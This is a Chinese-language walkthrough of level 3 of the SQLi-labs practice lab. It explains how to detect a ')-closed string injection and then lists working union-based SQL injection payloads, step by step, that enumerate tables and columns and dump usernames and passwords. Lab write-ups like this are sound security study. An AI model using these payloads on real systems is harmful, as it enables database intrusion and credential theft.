SQLI-labs-第三关

目录

知识点：单括号)字符get注入

1、判断注入点：

2、判断当前表的字段数

3、判断回显位置

4、爆库名

5、爆表名

6、爆字段名，以users表为例

7、爆值

---

知识点：单括号)字符get注入

思路：

1、判断注入点：

在url中输入?id=1

输入?id=1'  ,SQL语句语法错误 ,说明是字符型注入，附近有个括号，可能是括号闭合出错

输入?id=1' --+ ，依然报错，说明不是单引号闭合问题，而是括号问题

输入?id=1') --+ ，回显正常

这里就可以确认为括号闭合错误，根据上面的源码，跟我们的猜想是一致的。 

输入?id=1' --+ 因为后面的括号被我们注释掉了，所以依旧会报错，补充一个括号就完整不会报错，根据报错的提示信息可以得知。

2、判断当前表的字段数

?id=1')  order by 3 --+

?id=1')  order by 4 --+

报错，说明当前的数据表字段有3个

3、判断回显位置

?id=1')  and 1=2 union select 1,2,3 --+

4、爆库名

/?id=1')  and 1=2 union select 1,2,database() --+

5、爆表名

?id=1')  and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

6、爆字段名，以users表为例

?id=1')  and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

7、爆值

?id=1')  and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 1,1 --+

修改limit的值，以此类推，得到数据库所有的数据。

---

这篇文章就写到这里了，欢迎批评指出